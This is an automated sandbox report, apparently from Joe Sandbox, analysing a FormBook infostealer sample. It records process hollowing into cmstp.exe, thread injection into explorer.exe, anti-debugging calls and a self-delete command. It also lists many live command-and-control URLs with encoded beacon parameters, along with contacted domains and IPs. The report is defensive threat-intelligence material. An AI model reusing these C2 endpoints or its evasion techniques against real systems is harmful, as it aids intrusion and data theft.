          Source: C:\Windows\explorer.exe | Domain query: www.curiosityisthecurebook.com
          Source: C:\Windows\explorer.exe | Domain query: www.usinggroovefunnels.com
          Contains functionality to prevent local Windows debugging
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_73791000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Section loaded: unknown target: C:\Users\user\Desktop\TazxfJHRhq.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\cmstp.exe | Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 1190000
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Process created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: explorer.exe, 00000003.00000000.219509749.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000002.478136214.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.478136214.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.478136214.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          The matrix is rendered below one tactic per line. Digits in parentheses after a technique name are the count badges the report attaches to that technique; techniques without a badge are listed in the matrix but were not observed for this sample.

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
          Execution: Native API (1); Shared Modules (1); At (Linux); At (Windows); Cron; Launchd
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
          Privilege Escalation: Process Injection (612); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
          Defense Evasion: Virtualization/Sandbox Evasion (3); Process Injection (612); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (11); Steganography
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
          Discovery: Security Software Discovery (141); Virtualization/Sandbox Evasion (3); Process Discovery (2); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (12)
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
          Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
          Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (13); Fallback Channels; Multiband Communication
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features

          Behavior Graph

          Behavior Graph ID: 383852 | Sample: TazxfJHRhq.exe | Start date: 08/04/2021 | Architecture: WINDOWS | Score: 100

          Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures

          Process tree (the graph, rendered as text):
          - TazxfJHRhq.exe (started)
              Dropped file: C:\Users\user\AppData\...\i9y7dp4bi0ysdq.dll, PE32
              Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Contains functionality to prevent local Windows debugging
            - TazxfJHRhq.exe (started)
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              - explorer.exe (injected)
                  DNS/IP: usinggroovefunnels.com 192.185.48.194, 49745, 80, UNIFIEDLAYER-AS-1US, United States; www.de-knutselkeet.com 188.93.150.75, 49740, 80, SIGNET-ASSignetBVNL, Netherlands; 20 other IPs or domains
                  Signatures: System process connects to network (likely due to code injection or exploit)
                - cmstp.exe (started)
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  - cmd.exe (started)
                    - conhost.exe (started)

          Screenshots

          (Screenshot thumbnails are not reproduced in this text rendering of the report.)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          TazxfJHRhq.exe | 15% | Virustotal | -
          TazxfJHRhq.exe | 25% | ReversingLabs | Win32.Trojan.Wacatac

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.2.TazxfJHRhq.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.2.cmstp.exe.4af7960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
          1.1.TazxfJHRhq.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.TazxfJHRhq.exe.73790000.5.unpack | 100% | Avira | HEUR/AGEN.1131513
          0.2.TazxfJHRhq.exe.27a0000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.2.cmstp.exe.6bd538.1.unpack | 100% | Avira | TR/Patched.Ren.Gen

          Domains

          Source | Detection | Scanner | Label
          www.jcernadas.com | 0% | Virustotal | -
          www.de-knutselkeet.com | 0% | Virustotal | -

URLs

Entries the report lists three times (one per URL Reputation lookup) are collapsed into a single row marked (x3).

Source | Detection | Scanner | Label
http://www.autotrafficbot.com/evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
http://www.jamessicilia.com/evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe (x3)
http://www.kinfet.com/evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
http://www.physicalrobot.com/evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
http://www.zhuledao.com/evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
http://www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu | 100% | Avira URL Cloud | malware
http://www.tiro.com | 0% | URL Reputation | safe (x3)
www.autotrafficbot.com/evpn/ | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe (x3)
http://www.jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu | 100% | Avira URL Cloud | malware
http://www.curiosityisthecurebook.com/evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe (x3)
http://www.sajatypeworks.com | 0% | URL Reputation | safe (x3)
http://www.typography.netD | 0% | URL Reputation | safe (x3)
http://www.de-knutselkeet.com/evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe (x3)
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe (x3)
http://fontfabrik.com | 0% | URL Reputation | safe (x3)
http://www.founder.com.cn/cn | 0% | URL Reputation | safe (x3)
http://www.productsoffholland.com/evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytN | 0% | Avira URL Cloud | safe
http://www.markmalls.com/evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe (x3)
http://www.usinggroovefunnels.com/evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu | 100% | Avira URL Cloud | malware
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe (x3)
http://www.cgpizza.net/evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe (x3)
http://www.physicalrobot.com/ | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe (x3)
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe (x3)
http://www.sakkal.com | 0% | URL Reputation | safe (x3)
http://www.tor-one.com/evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
http://www.physicalrobot.com | 0% | Avira URL Cloud | safe

          Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.jcernadas.com | 52.216.152.43 | true | true | - | unknown
www.de-knutselkeet.com | 188.93.150.75 | true | true | - | unknown
www.markmalls.com | 35.240.239.44 | true | false | - | unknown
curiosityisthecurebook.com | 34.102.136.180 | true | false | - | unknown
usinggroovefunnels.com | 192.185.48.194 | true | true | - | unknown
www.jamessicilia.com | 208.91.197.91 | true | true | - | unknown
shops.myshopify.com | 23.227.38.74 | true | true | - | unknown
www.tor-one.com | 80.67.16.8 | true | true | - | unknown
cgpizza.net | 34.102.136.180 | true | false | - | unknown
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 52.15.160.167 | true | false | - | high
www.physicalrobot.com | 52.58.78.16 | true | true | - | unknown
www.autotrafficbot.com | 45.88.202.115 | true | true | - | unknown
productsoffholland.com | 45.82.188.40 | true | true | - | unknown
ext-sq.squarespace.com | 198.185.159.144 | true | false | - | high
www.theholisticbirthco.com | unknown | unknown | true | - | unknown
www.productsoffholland.com | unknown | unknown | true | - | unknown
www.kinfet.com | unknown | unknown | true | - | unknown
www.glgshopbd.com | unknown | unknown | true | - | unknown
www.zhuledao.com | unknown | unknown | true | - | unknown
www.cgpizza.net | unknown | unknown | true | - | unknown
www.curiosityisthecurebook.com | unknown | unknown | true | - | unknown
www.usinggroovefunnels.com | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.autotrafficbot.com/evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu | true | Avira URL Cloud: safe | unknown
http://www.jamessicilia.com/evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu | true | Avira URL Cloud: safe | unknown
http://www.kinfet.com/evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu | true | Avira URL Cloud: safe | unknown
http://www.physicalrobot.com/evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu | true | Avira URL Cloud: safe | unknown
http://www.zhuledao.com/evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu | true | Avira URL Cloud: safe | unknown
http://www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu | true | Avira URL Cloud: malware | unknown
www.autotrafficbot.com/evpn/ | true | Avira URL Cloud: safe | low
http://www.jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu | true | Avira URL Cloud: malware | unknown
http://www.curiosityisthecurebook.com/evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu | false | Avira URL Cloud: safe | unknown
http://www.de-knutselkeet.com/evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu | true | Avira URL Cloud: safe | unknown
http://www.productsoffholland.com/evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu | true | Avira URL Cloud: safe | unknown
http://www.markmalls.com/evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu | false | Avira URL Cloud: safe | unknown
http://www.usinggroovefunnels.com/evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu | true | Avira URL Cloud: malware | unknown
http://www.cgpizza.net/evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu | false | Avira URL Cloud: safe | unknown
http://www.tor-one.com/evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

All explorer.exe entries were found in memory dump 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp; all cmstp.exe entries in 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmp. The explorer.exe strings are typeface-vendor URLs of the kind carried in font-file metadata (several with a stray trailing byte, e.g. "designersG", ".coml"), not sample activity; only the three cmstp.exe entries relate to the sample. Entries the report lists three times (one per URL Reputation lookup) are collapsed into a single row marked (x3).

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe | false | - | high
http://www.fontbureau.com | explorer.exe | false | - | high
http://www.fontbureau.com/designersG | explorer.exe | false | - | high
http://www.fontbureau.com/designers/? | explorer.exe | false | - | high
http://www.founder.com.cn/cn/bThe | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers? | explorer.exe | false | - | high
http://www.tiro.com | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers | explorer.exe | false | - | high
http://www.goodfont.co.kr | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.carterandcone.coml | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.sajatypeworks.com | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.typography.netD | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe | false | - | high
http://www.founder.com.cn/cn/cThe | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://fontfabrik.com | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.founder.com.cn/cn | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe | false | - | high
http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytN | cmstp.exe | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers8 | explorer.exe | false | - | high
http://www.fonts.com | explorer.exe | false | - | high
http://www.sandoll.co.kr | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.physicalrobot.com/ | cmstp.exe | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deDPlease | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.zhongyicts.com.cn | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.sakkal.com | explorer.exe | false | URL Reputation: safe (x3) | unknown
http://www.physicalrobot.com | cmstp.exe | false | Avira URL Cloud: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.58.78.16 | www.physicalrobot.com | United States | 16509 | AMAZON-02US | true
80.67.16.8 | www.tor-one.com | Germany | 34011 | GD-EMEA-DC-CGN1DE | true
35.240.239.44 | www.markmalls.com | United States | 15169 | GOOGLEUS | false
45.88.202.115 | www.autotrafficbot.com | Switzerland | 34962 | ANONYMIZEEpikNetworkCH | true
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
198.185.159.144 | ext-sq.squarespace.com | United States | 53831 | SQUARESPACEUS | false
192.185.48.194 | usinggroovefunnels.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
208.91.197.91 | www.jamessicilia.com | Virgin Islands (British) | 40034 | CONFLUENCE-NETWORK-INCVG | true
188.93.150.75 | www.de-knutselkeet.com | Netherlands | 49685 | SIGNET-ASSignetBVNL | true
34.102.136.180 | curiosityisthecurebook.com | United States | 15169 | GOOGLEUS | false
52.15.160.167 | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false
52.216.152.43 | www.jcernadas.com | United States | 16509 | AMAZON-02US | true
45.82.188.40 | productsoffholland.com | Netherlands | 31477 | DUOCAST-ASNL | true

                                                                      General Information

                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                      Analysis ID:383852
                                                                      Start date:08.04.2021
                                                                      Start time:11:08:26
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 11m 34s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Sample file name:TazxfJHRhq.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:28
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/3@15/13
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 24% (good quality ratio 22.1%)
                                                                      • Quality average: 76%
                                                                      • Quality standard deviation: 30.2%
                                                                      HCA Information:
                                                                      • Successful, ratio: 92%
                                                                      • Number of executed functions: 90
                                                                      • Number of non-executed functions: 62
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.54.113.53, 13.88.21.125, 104.43.193.48, 52.147.198.201, 95.100.54.203, 20.50.102.62, 23.10.249.26, 23.10.249.43, 20.54.26.129
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                      52.58.78.16 | hvEop8Y70Y.exe | Get hash | malicious | Browse
                                                                      • www.ux300e.com/iu4d/?AR6=JvjSk9WUlBdgONG69H9sib5J4SPt/vPlwOmf1A06UqzVvRJVghpTE97et7kDme6aF6nY&nflLiT=xPJxAxbPf
                                                                      | payment.exe | Get hash | malicious | Browse
                                                                      • www.zhongziciliso.com/bei3/?Rl=M48tiJch&M4YDYvh=k7z9a6KJXiC72cK7/jyRasNe+Sy9PqpwlSKQgjyd8bQZ1xLLuKiQUgQj6rSCbw2ZrbBi
                                                                      | Order.exe | Get hash | malicious | Browse
                                                                      • www.knfsupplies.com/cugi/?BlL=qOwU1OTG7mkRPnuzfMsyuhPzA0VHPvUCBiAoo9Zce23EVhCwG2VyIrVTMhZllQbTDf+j&EZXpx6=tXExBh8PdJwpH
                                                                      | BL84995005038483.exe | Get hash | malicious | Browse
                                                                      • www.bestsocialprograms.com/mb7q/?Kzr4=aRV3v7STN1gbvnN6un228S10svC1Sutq8rbGJILV4mttNz8FuFvB2m5MPz63ES8dTJFmRm2LIQ==&OtZlC2=JPhH0LRX981dlx
                                                                      | PO91361.exe | Get hash | malicious | Browse
                                                                      • www.yuemion.com/sb9r/?j2JhErl=rJxolaRUr1mWG0o1dUZb+NmVdUrYk2L88LMId3La8wrAf3SFZTorjLllmLv1JSZYoSAD&NXf8l=AvBHWhTxsnkxJjj0
                                                                      | RFQ-V-SAM-0321D056-DOC.exe | Get hash | malicious | Browse
                                                                      • www.suosht.com/uwec/?v2=tsMTrLYcrap2GukmDd5H+gA9PR5vxlRtmXcAAVzRggD35KIYdxkEWToTwr5T4ko2rax0&CZ6=7nExZbW
                                                                      | Shinshin Machinery.exe.exe | Get hash | malicious | Browse
                                                                      • www.annabelsasia.com/g7b/?Bzu=IjtUh+ajvqDBCqeZNN5uvvLYJJH0gAt6k2v6kHQzMhdo+O3jDfMFt+ZnLjs+WScGQBhC&Rxo=M6hD4jnx_05t
                                                                      | yQh96Jd6TZ.exe | Get hash | malicious | Browse
                                                                      • www.nicemoneymaker.com/vu9b/?OV0xlV=b7gOWZrG8twfyhpAFuxkPT+vPN2LggkC47Unn4g6AMPZt2SHOO4aYUooq1pwGFLGZrTg&wh=jL0xYFb0mbwHi
                                                                      | Invoice No. 21SWZ020.exe | Get hash | malicious | Browse
